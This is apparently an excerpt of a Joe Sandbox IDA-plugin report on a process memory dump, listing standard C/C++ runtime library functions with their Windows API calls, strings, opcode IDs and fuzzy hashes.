csm, xrefs: 00B7B7A1
MOC, xrefs: 00B7B789
RCC, xrefs: 00B7B795

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 78c669ec4b5ae15d34ce2a8a2e3c5af6db28b4e87776b61ed55d7e75a0a3d33d
Instruction ID: 36f33521be732a8f019db167d8cf72e758d880f076f927a398a6738f5f038604
Opcode Fuzzy Hash: 78c669ec4b5ae15d34ce2a8a2e3c5af6db28b4e87776b61ed55d7e75a0a3d33d
Instruction Fuzzy Hash: B821A1359016059FCF289FA4C455FA9B7ECEF40720F14C59EF42987690DB34AE40CE81

Function 00B96940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B969DC,00000000,?,00BAD2B0,?,?,?,00B96913,00000004,InitializeCriticalSectionEx,00BA0D34,00BA0D3C), ref: 00B9694D
GetLastError.KERNEL32(?,00B969DC,00000000,?,00BAD2B0,?,?,?,00B96913,00000004,InitializeCriticalSectionEx,00BA0D34,00BA0D3C,00000000,?,00B8BBBC), ref: 00B96957
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B9697F

Strings

api-ms-, xrefs: 00B96964

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b8193f6d4505b1676574f9fc5b1f1019d7545f143862515be7bb8b918f8df2db
Instruction ID: 6f47882151d23bbb91621c2a1358d9b6e4dd15379615ad4e400fdfd1a621db72
Opcode Fuzzy Hash: b8193f6d4505b1676574f9fc5b1f1019d7545f143862515be7bb8b918f8df2db
Instruction Fuzzy Hash: CCE01AB0384204BAEF201B64EC4AB6D3B95EF55B91F1804B0FA4CA84E0EB71EC509944

Function 00B93F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(6126FD41,00000000,00000000,?), ref: 00B94001

Part of subcall function 00B8C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B8D895,?,00000000,-00000008), ref: 00B8C082

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B94253
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B94299
GetLastError.KERNEL32 ref: 00B9433C

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 269c26ed0b467c2cd546d79ba3997d47fcfb0368c9c70411b247577cc4cee03c
Instruction ID: b108fdeb7b60fd07ec90c702c9ac0db6699f8f6b259aa70187f34aa861e586d5
Opcode Fuzzy Hash: 269c26ed0b467c2cd546d79ba3997d47fcfb0368c9c70411b247577cc4cee03c
Instruction Fuzzy Hash: 01D127B5D042589FCF15CFA8C880AADBBF5FF09314F2845AAE556EB251DB30A942CB50

Function 00B8B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B8B35C
___AdjustPointer.LIBCMT ref: 00B8B37F
___AdjustPointer.LIBCMT ref: 00B8B41B

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 57741f5bf7c4e9bbc67bced0ef6f7a4de8db80b566e4a7860c44981d13c878bb
Instruction ID: a275861e683b45c4c146206f8640dbb4441df37a38913a13340c793ca16b4da9
Opcode Fuzzy Hash: 57741f5bf7c4e9bbc67bced0ef6f7a4de8db80b566e4a7860c44981d13c878bb
Instruction Fuzzy Hash: 4151D072A04606EFDB29AF70C891FAA77E4EF00710F1440ADE916572B1E731EC80CB94

Function 00B77220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B772C5
std::_Throw_Cpp_error.LIBCPMT ref: 00B77395
std::_Throw_Cpp_error.LIBCPMT ref: 00B773A3
std::_Throw_Cpp_error.LIBCPMT ref: 00B773B1

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 412cc726bcc5b7482ab9b277b15882dcd0b3880b322f267d0023ede442dc93d7
Instruction ID: b044851cc6f9d658d1f8d01006dbbbe587f0848153074f6d84894dba9bcbf5f7
Opcode Fuzzy Hash: 412cc726bcc5b7482ab9b277b15882dcd0b3880b322f267d0023ede442dc93d7
Instruction Fuzzy Hash: EA41D2B19447058BDB20DB24C881B6EB7E4FF44320F15C6B9D83E5B691EB34E811CB95

Function 00B74460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B74495
std::_Lockit::_Lockit.LIBCPMT ref: 00B744B2
std::_Lockit::~_Lockit.LIBCPMT ref: 00B744D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00B74580

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: f0c03f8cd6c71c588b6e8b71b4811f79193d6107e2e26c916033c6df6ccb5910
Instruction ID: 58b1d1bf007dac8f0968451af258e4fcd10bd3b4b6be2d6d4e9105185468f244
Opcode Fuzzy Hash: f0c03f8cd6c71c588b6e8b71b4811f79193d6107e2e26c916033c6df6ccb5910
Instruction Fuzzy Hash: 2C414B71D002198FCB10DF94D845BAEBBF0FB99721F1482A9E82967391DB34AD44CF91

Function 00B91DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B8D895,?,00000000,-00000008), ref: 00B8C082

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B91E2A
__dosmaperr.LIBCMT ref: 00B91E31
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B91E6B
__dosmaperr.LIBCMT ref: 00B91E72

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 604dcde668cfbaa04059627760435e46f64abcb4772db95545704a74938b799d
Instruction ID: a0a6891b6bf4b3d54d2cff3bc57d86224bf195eb3cd2ab27109abae1cbcef5b5
Opcode Fuzzy Hash: 604dcde668cfbaa04059627760435e46f64abcb4772db95545704a74938b799d
Instruction Fuzzy Hash: C0218371604616AF9F21AF69888196BB7E9FF0536471089F9FC1997151EB30EC01EBA0

Function 00B82BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93c934aba7769ee0c97f29b74ddd88e5773ba4ce7e3a8fc0471dc643832aec4
Instruction ID: 900c8ce65108160faa1d32946f243ebe9f09508e190b1b9f0cacafe596e20f80
Opcode Fuzzy Hash: b93c934aba7769ee0c97f29b74ddd88e5773ba4ce7e3a8fc0471dc643832aec4
Instruction Fuzzy Hash: ED216D71204215AFDB21BF65CD8197A7BE9FF40364B244599F86597271EB30EC40DBA0

Function 00B931BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B931C6

Part of subcall function 00B8C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B8D895,?,00000000,-00000008), ref: 00B8C082

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B931FE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B9321E

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 1aa1a4045e74d77a588271643fb260413bf8cb01961969f60c9781ff644f2b78
Instruction ID: d5b86eff0b5c2f704cde0d91b7f305c931a14b440f1ec87a91bf822658a2db14
Opcode Fuzzy Hash: 1aa1a4045e74d77a588271643fb260413bf8cb01961969f60c9781ff644f2b78
Instruction Fuzzy Hash: 811180F15015157EAB223BB55CCACBF7EDCDE96BA571404A4FA0592111FF64DF0082B1

Function 00B7E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B7E899
std::_Lockit::_Lockit.LIBCPMT ref: 00B7E8A3
int.LIBCPMT ref: 00B7E8BA

Part of subcall function 00B7C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B7C1F6
Part of subcall function 00B7C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B7C210

std::_Lockit::~_Lockit.LIBCPMT ref: 00B7E914

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 09b5ba30a6827d6f0195a463e352d9ec8602fe050011b270edadd68c8ff391f0
Instruction ID: b6607658832b42e7e90fdaac76e2998196b15f95e4227b6f1bd722c840070081
Opcode Fuzzy Hash: 09b5ba30a6827d6f0195a463e352d9ec8602fe050011b270edadd68c8ff391f0
Instruction Fuzzy Hash: 4711E532804115DBCF05EBA4C95567E7BF1AF88710F2480D8F4396B281CF309E00CB81

Function 00B9ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000), ref: 00B9ADB7
GetLastError.KERNEL32(?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000,?,?,?,00B93CD6,00000000), ref: 00B9ADC3

Part of subcall function 00B9AE20: CloseHandle.KERNEL32(FFFFFFFE,00B9ADD3,?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000,?,?), ref: 00B9AE30

___initconout.LIBCMT ref: 00B9ADD3

Part of subcall function 00B9ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B9AD91,00B9A2DC,?,?,00B94390,?,00000000,00000000,?), ref: 00B9AE08

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000,?), ref: 00B9ADE8

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0bede8ca424c37b4ec282c4841fcd73970bbbf58c9221561f7f07ecfb904063b
Instruction ID: 29cbe4bc9b72a652a30cf6fb0451bc4d02259d2f057698cf5885ecdc4f697c34
Opcode Fuzzy Hash: 0bede8ca424c37b4ec282c4841fcd73970bbbf58c9221561f7f07ecfb904063b
Instruction Fuzzy Hash: 43F0AC36514119BBCF221FD5DC09A9A7F66FF497A1B144071FE1996130DB328C60ABD1

Function 00B804F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B80507
GetCurrentThreadId.KERNEL32 ref: 00B80516
GetCurrentProcessId.KERNEL32 ref: 00B8051F
QueryPerformanceCounter.KERNEL32(?), ref: 00B8052C

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 64cc2d8b123e9f12abd8aae4a1dc4cd18afadba8183d22f0c33860965422cc52
Instruction ID: a1e6d92dcec3bd6cb6ba3a6c2745c1ecde3fceb790ad8870111c72a331e2b361
Opcode Fuzzy Hash: 64cc2d8b123e9f12abd8aae4a1dc4cd18afadba8183d22f0c33860965422cc52
Instruction Fuzzy Hash: 62F062B4D1020DEBCB00DFB4DA4999EBBF4FF1D200B9549A5E452E7110EB30AB449B50

Function 00B90976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00B85BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00B90A35
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00B85BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00B90A6C

Strings

utf8, xrefs: 00B90B3E

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 0069b770f2f9a6eeca9acd91f219abcbdc9367c1d183d9f3f63478e4e418422a
Instruction ID: effc823f0bf5d0390aa0c34c82a071ec16fd831188866ce0ca600179402e4ae3
Opcode Fuzzy Hash: 0069b770f2f9a6eeca9acd91f219abcbdc9367c1d183d9f3f63478e4e418422a
Instruction Fuzzy Hash: EC51D572624305AEDF24BB358C82FBA73E8EF05714F1444F9F54997182E670E980C7A5

Function 00B773E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00B77526
___std_exception_copy.LIBVCRUNTIME ref: 00B77561

Part of subcall function 00B7AF37: CreateThreadpoolWork.KERNEL32(00B7B060,00B78A2A,00000000), ref: 00B7AF46
Part of subcall function 00B7AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00B7AF53

Strings

Fail to schedule the chore!, xrefs: 00B77551, 00B77560

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
String ID: Fail to schedule the chore!
API String ID: 3683891980-3313369819
Opcode ID: f64527b2b1e5ec1936ca625ce4d6e982b05f8aff7b244b2a46e730afaea51a41
Instruction ID: c0322cbcfaec510b33a5b816d4694254bfe795684aed61b288b82c528e7b09bc
Opcode Fuzzy Hash: f64527b2b1e5ec1936ca625ce4d6e982b05f8aff7b244b2a46e730afaea51a41
Instruction Fuzzy Hash: DD518CB1900208DFCB04DF54D885BAEBBF0FF48314F1881A9E829AB391DB75A905CF91

Function 00B8B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B8B893,?,?,00000000,00000000,00000000,?), ref: 00B8B9B7

Strings

MOC, xrefs: 00B8B9C9
RCC, xrefs: 00B8B9D1

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4c778952dd02bb4ba4b0c92c22ff8e55bf8a00016f8c93dfe15ff8c57a607969
Instruction ID: 322997b495d1d1214d5417ba28149d6801e2cde20155e7c3164766c0e317476e
Opcode Fuzzy Hash: 4c778952dd02bb4ba4b0c92c22ff8e55bf8a00016f8c93dfe15ff8c57a607969
